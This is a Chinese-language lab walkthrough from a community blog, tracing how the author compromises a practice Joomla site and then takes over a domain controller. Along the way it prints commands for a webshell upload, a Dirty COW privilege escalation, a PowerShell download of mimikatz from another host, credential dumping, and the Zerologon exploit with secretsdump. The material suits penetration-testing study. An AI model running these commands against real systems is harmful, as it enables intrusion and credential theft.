靶场学习 - 从 joomla 到拿下域控

举报
亿人安全 发表于 2023/05/30 21:52:09 2023/05/30
【摘要】 访问网站主页,是一个博客网站常规的目录扫描这里发现一个疑似后台地址,访问 http://192.168.2.252/administrator/为 joomla 站点,印象中记得有 rce 的漏洞,上网寻找相关脚本进行利用正当我以为一键 getshell 后,发现并没有利用成功继续寻找其他利用点,这里通过 configuration.php~ 找到一个数据库的文件PLAINTEXT1mysq...

访问网站主页,是一个博客网站

image-20220507214154032

常规的目录扫描

image-20220507214255395

这里发现一个疑似后台地址,访问 http://192.168.2.252/administrator/

image-20220507214333809

为 joomla 站点,印象中记得有 rce 的漏洞,上网寻找相关脚本进行利用

正当我以为一键 getshell 后,发现并没有利用成功

image-20220507222602357

继续寻找其他利用点,这里通过 configuration.php~ 找到一个数据库的文件

PLAINTEXT

1
mysql数据库 testuser/cvcvgjASD!@ 

image-20220507222516888

使用 navicat 进行连接,可看到这里的密码为 bcrypt 加密,这个是不可逆的,一般是通过重新生成 hash 进行替换

image-20220507222803614

重新生成一个 hash 发现还是登陆不上

image-20220508125000547

这时候去阅读 joomla 的官方文档,寻找重置密码的方式

image-20220508125257185

PLAINTEXT

1
secret = d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199

这里把密码重置为 secret,重置后可以成功登录

image-20220508124845100

找到 template 模块进行 webshell 文件上传

image-20220508152134399

image-20220508130502927

哥斯拉成功连接

image-20220508130626190

连接之后发现很多命令执行不了

image-20220508132842016

这里使用哥斯拉自带的模块绕过 disable_function 执行命令

image-20220508132939917

通过 wwwuser/wwwuser_123Aqx 进行 ssh 登录

登陆后输入 uname -a 发现可以使用脏牛进行提权

image-20220508145159335

这里有两个坑点

1、必须把 dirty.c 传到机器上再进行编译,直接上传编译好的文件运行会报错

2、使用 xshell 传输不成功,改用 xftp 可以传输成功

PLAINTEXT

1
2
gcc -pthread dirty.c -o dirty -lcrypt
./dirty 123

提权成功,使用 firefart 用户进行登录,密码为 123

image-20220508145004023

接着进行内网信息搜集,发现机器为双网卡

image-20220508141735681

通过 ping 发现机器出网

image-20220508205934131

上传 frp 搭建代理隧道

image-20220508162954250

proxifier 配置完成测试成功

image-20220508163120210

搭建好隧道后进行内网扫描,这里根据网络环境使用禁 ping 扫描

image-20220508162859689

扫描结果如下

PLAINTEXT

1
2
3
SMB: 192.168.93.30	TEST     WIN7           	(Win7-Professional-7601-SP1_6.1.7601)
SMB: 192.168.93.20	TEST     WIN2008        	(Win(R)-2008-Datacenter-6003-SP2_6.0.6003)
SMB: 192.168.93.10	TEST     WIN-8GA56TNV3MV	(Win2012-R2-Datacenter-9600_6.3.9600)

接着对这些 ip 进行端口扫描

image-20220508163504497

这里发现开启了 smb 端口,尝试进行 smb 爆破,成功爆破出账密

PLAINTEXT

1
administrator:123qwe!ASD

image-20220508221614860

这里使用 wmiexec 进行连接

PLAINTEXT

1
python wmiexec.py administrator:123qwe!ASD@192.168.93.20

image-20220508165546774

可看到 dns 服务器为 192.168.93.10 ,一般来说 dns 服务器就是域控,初步判断 192.168.93.10 为域控机器

这里一开始打算直接 powershell 上线,但后面发现内网主机不出网,因此寻找其他的方法

接着通过 tasklsit /svc 进行杀软识别,机器上无杀软

image-20220508165929615

由于内网不出网,这里在 linux 机器上开启 http 服务,把 mimikatz 扔上去

image-20220508172107638

然后使用 powershell 进行下载运行,这里下载完会卡住,可以通过对比文件大小判断是否传输完毕

PLAINTEXT

1
powershell (new-object Net.WebClient).DownloadFile('http://192.168.93.110:8000/mimi.exe','C:\mimi.exe')

image-20220508221556766

由于获取到的是非交互式 shell,这里使用日志保存

PLAINTEXT

1
mimi.exe log privilege::debug sekurlsa::logonpasswords

image-20220508172039644

但是问题来了,这里读出来的 log 为空,这里判断是 lsa 保护,果不其然

PLAINTEXT

1
2
3
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA 
#开启LSA保护 reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 1 /f   
#关闭LSA保护 reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f

image-20220508171853971

修改完注册表的话需要重启,但重启之后上面登着的进程也没了,意义不大

这里初步判断 192.168.93.10 为域控,尝试使用 CVE-2020-1472,由于代理不太稳定,靶机直接开 3389 上去干

PLAINTEXT

1
2
3
4
5
6
7
8
#执行以下命令操作注册表来开启机器3389远程桌面服务 
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 

#执行以下命令操作注册表来关闭机器3389远程桌面服务 
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

#使用以下命令添加防火墙放行策略 
netsh firewall add portopening protocol = TCP port = 3389 name = rdp

CVE-2020-1472 漏洞利用

PLAINTEXT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
python3 cve-2020-1472-exploit.py WIN-03OO218S5B8 192.168.111.130

secretsdump.py Mikasa.com/WIN-03OO218S5B8$@192.168.111.130 -just-dc -no-pass

psexec.py administrator@10.1.1.60 -hashes

reg save HKLM\SYSTEM system.save 
reg save HKLM\SAM sam.save 
reg save HKLM\SECURITY security.save 
get system.save 
get sam.save 
get security.save 
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

python3 reinstall_original_pw.py dc-hostname dc-ip hash

成功利用

image-20220508221633518

image-20220508221643955

置空之后利用获取到的 hash 对域控进行连接

image-20220508221657492

获取桌面上的 flag.txt

image-20220628152103490


【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。